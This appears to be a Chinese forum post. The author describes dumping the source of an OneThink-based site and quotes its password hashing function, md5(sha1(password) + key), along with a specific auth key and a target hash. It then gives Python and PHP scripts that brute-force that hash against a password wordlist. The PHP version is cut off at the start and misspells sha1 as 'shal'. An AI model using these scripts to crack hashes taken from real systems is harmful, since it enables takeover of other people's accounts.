昨天遇到一个基于onethink开发的程序。源码是脱下来了。但是密码始终破解不了。来看看加密函数

function think_ucenter_md5($str, $key = 'ThinkUCenter'){	return '' === $str ? '' : md5(sha1($str) . $key);}if(is_array($user) && $user['status']){			/* 验证用户密码 */			if(think_ucenter_md5($password, UC_AUTH_KEY) === $user['password']){				$this->updateLogin($user['id']); //更新用户登录信息				return $user['id']; //登录成功，返回用户ID			} else {				return -2; //密码错误			}define('UC_AUTH_KEY', 'W#RZ5cfy1n]Qk3zu2HvgqC@>Gt0%&P|DJr{^EM9!');

总感觉无法可逆，所以只能爆破，有更好方法的大大，介绍给我

py版本

#coding:utf-8#author:jwongimport hashlibkey = 'W#RZ5cfy1n]Qk3zu2HvgqC@>Gt0%&P|DJr{^EM9!'result = '9fdf7c3ba521d12db4d56540eb1bca15'def md5(str):    m = hashlib.md5()    m.update(str)    return m.hexdigest()def sha1(str):    s = hashlib.sha1()    s.update(str)    return s.hexdigest()def main():    try:        with open('password.txt','rb') as f:            for line in f.readlines():                print "trying: %s " % line                str1 = sha1(line) + key                password = md5(str1)                if password == result:                    print 'password is %s ' % line    except Exception, e:        print 'could not open file' , eif __name__ == '__main__':    main()

php版本

     Gt0%&P|DJr{^EM9!';$md5_pass = "9fdf7c3ba521d12db4d56540eb1bca15";foreach($lines as $line){    $str1 = md5(shal($line).$key);    if($str1 == $md5_pass){        echo 'password: '.$line;        break;    }}?>